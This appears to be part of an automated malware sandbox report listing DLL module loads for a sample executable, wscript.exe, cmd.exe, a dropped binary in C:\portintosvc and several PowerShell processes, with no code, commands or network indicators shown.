Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: dlnashext.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wpdshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: version.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: wldp.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: profapi.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: ktmw32.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: rasman.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: secur32.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: schannel.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: propsys.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: dlnashext.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: wpdshext.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: edputil.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: netutils.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: slc.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: userenv.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: sppc.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\portintosvc\driverInto.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
